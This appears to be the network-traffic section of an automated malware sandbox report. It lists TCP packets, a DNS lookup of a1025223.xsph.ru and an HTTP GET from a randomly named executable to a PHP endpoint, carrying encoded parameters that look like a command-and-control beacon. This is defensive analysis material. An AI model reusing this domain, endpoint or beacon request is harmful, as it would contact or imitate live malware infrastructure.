                                  Sep 27, 2024 08:43:36.060664892 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.060677052 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.060688019 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.060713053 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:36.061049938 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.061100960 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:36.061105013 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.061121941 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.061134100 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.061144114 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.061165094 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:36.061182976 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:36.061846972 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.061856985 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.061882973 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.061893940 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.061894894 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:36.061906099 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.061932087 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:36.062697887 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.062716007 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.062743902 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:36.065294027 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.065344095 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:36.065346956 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.065357924 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.065370083 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.065398932 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:36.065643072 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.065690041 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:36.065716028 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.066031933 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.066051960 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.066068888 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:36.115433931 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:36.179591894 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.179617882 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.179636955 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.179646969 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.179658890 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.179671049 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:36.179683924 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.179702044 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.179709911 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:36.179712057 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.179723978 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.179730892 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:36.179735899 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.179759979 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:36.179781914 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:36.179922104 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.179932117 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.179992914 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:36.182079077 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:36.186887026 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.391685009 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.391711950 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.391721964 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.391733885 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.391746044 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.391757011 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.391768932 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.391777992 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:36.391815901 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:36.392087936 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.392100096 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.392111063 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.392141104 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:36.392141104 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.392153025 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.392155886 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:36.392188072 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:36.392451048 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.392461061 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.392471075 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.392497063 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.392508984 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:36.392508984 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.392519951 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.392548084 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:36.392570019 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:36.392952919 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.392963886 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.392975092 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.393004894 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:36.393043995 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.393054008 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.393065929 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.393102884 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.393105030 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:36.393115997 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.393125057 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:36.393126965 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.393138885 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.393152952 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:36.393187046 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:36.393836975 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.393939018 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.393949986 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.393959999 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.393970013 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.393980980 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.394004107 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:36.394006968 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.394017935 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.394027948 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.394031048 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:36.394040108 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.394068003 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:36.394143105 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:36.394743919 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.394756079 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.394767046 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.394812107 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:36.394833088 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.394844055 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.394855022 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.394866943 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.394877911 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.394897938 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:36.394917965 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:36.394922972 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.394933939 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.394990921 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:36.395643950 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.395654917 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.395705938 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:36.397444963 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:53.148085117 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:53.153142929 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.153240919 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:53.153426886 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:53.158188105 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.823070049 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.823097944 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.823116064 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.823132992 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.823148012 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.823162079 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.823178053 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.823200941 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.823199034 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:53.823199034 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:53.823216915 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.823234081 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.823319912 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:53.823321104 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:53.823321104 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:53.828172922 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.828188896 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.828203917 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.828218937 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.828274012 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:53.937751055 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.937789917 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.937824965 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.937855959 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.937881947 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:53.937989950 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:53.942512035 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.942562103 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.942595005 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.942621946 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:53.942646027 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.942676067 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.942734003 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:53.947236061 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.947268963 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.947307110 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:53.947318077 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.947351933 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.947401047 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.947407007 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:53.947439909 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:53.952008009 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.952059984 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.952091932 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.952119112 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:53.952124119 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.952328920 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:53.956758022 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.956790924 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.956841946 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.956873894 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.956895113 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:53.956906080 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.956932068 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:53.961448908 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.961466074 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.961529016 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:54.052088976 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.052130938 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.052145958 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.052161932 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.052387953 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.052392960 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:54.052392960 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:54.052402973 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.052418947 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.052501917 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:54.052768946 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.052792072 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.052807093 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.052820921 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.052836895 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.052849054 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:54.052884102 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:54.138927937 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.156132936 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:54.163352013 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.365571022 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.365636110 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.365667105 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.365700006 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.365711927 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:54.365734100 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.365766048 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.365787029 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:54.365814924 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.365816116 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:54.366357088 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.366406918 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:54.366460085 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.366493940 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.366527081 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.366547108 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:54.366559982 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.366729975 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:54.367120028 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.367170095 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.367203951 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.367228031 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:54.367235899 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.367269993 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.367304087 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.367335081 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:54.367358923 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:54.367979050 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.368029118 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.368063927 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.368096113 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.368118048 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:54.368141890 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.368155956 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:54.368176937 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.368417978 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:54.368937016 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.368987083 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.369024992 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.369055033 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:54.369056940 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.369090080 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.369124889 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.369127035 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:54.369184971 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:54.369868994 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.369920969 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.369954109 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.369986057 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.370012999 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:54.370018959 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.370054007 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.370057106 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:54.370109081 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:54.370863914 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.370897055 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.370946884 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.370980024 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.370980024 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:54.371014118 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.371049881 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.371066093 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:54.371104956 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:54.371825933 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.371877909 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.371912003 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.371942997 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.371962070 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:54.371978045 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.372011900 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.372030020 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:54.372067928 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:54.372746944 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.379983902 CEST4972080192.168.2.9141.8.194.149

                                  UDP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Sep 27, 2024 08:42:22.505260944 CEST5121053192.168.2.91.1.1.1
                                  Sep 27, 2024 08:42:22.598475933 CEST53512101.1.1.1192.168.2.9

                                  DNS Queries

                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                  Sep 27, 2024 08:42:22.505260944 CEST192.168.2.91.1.1.10xbf1eStandard query (0)a1025223.xsph.ruA (IP address)IN (0x0001)false

                                  DNS Answers

                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                  Sep 27, 2024 08:42:22.598475933 CEST1.1.1.1192.168.2.90xbf1eNo error (0)a1025223.xsph.ru141.8.194.149A (IP address)IN (0x0001)false

                                  HTTP Request Dependency Graph

                                  • a1025223.xsph.ru

                                  HTTP Packets

                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.949714141.8.194.149802156C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
                                  TimestampBytes transferredDirectionData
                                  Sep 27, 2024 08:42:22.643987894 CEST465OUTGET /d2e9d328.php?YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF HTTP/1.1
                                  Accept: */*
                                  Content-Type: application/json
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                  Host: a1025223.xsph.ru
                                  Connection: Keep-Alive
                                  Sep 27, 2024 08:42:23.321708918 CEST1236INHTTP/1.1 403 Forbidden
                                  Server: openresty
                                  Date: Fri, 27 Sep 2024 06:42:23 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Vary: Accept-Encoding
                                  Data Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d [TRUNCATED]
                                  Data Ascii: dfbe<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title> 4030</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style>body,h1,p{padding:0;margin:0}*{font-family:Arial,sans-serif;font-style:normal;font-weight:400}.wrapper,.wrapper .content{width:100%;display:-webkit-box;display:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-ms-flex-pack:center;justify-content:center}.wrapper .content{width:inherit;max-width:1032px;height:100%;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-webkit-flex-direction:row;-moz-box-orient:horizontal;-moz-box-direction:normal;-ms-flex-direction:row;flex-direction:row;padding:128px 16px 0;min-height:-moz-calc(100vh - 128px);min-height:calc(100vh - 128px);-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;-webkit-box-pack:justify;-webkit-justify-content:space-betwe [TRUNCATED]
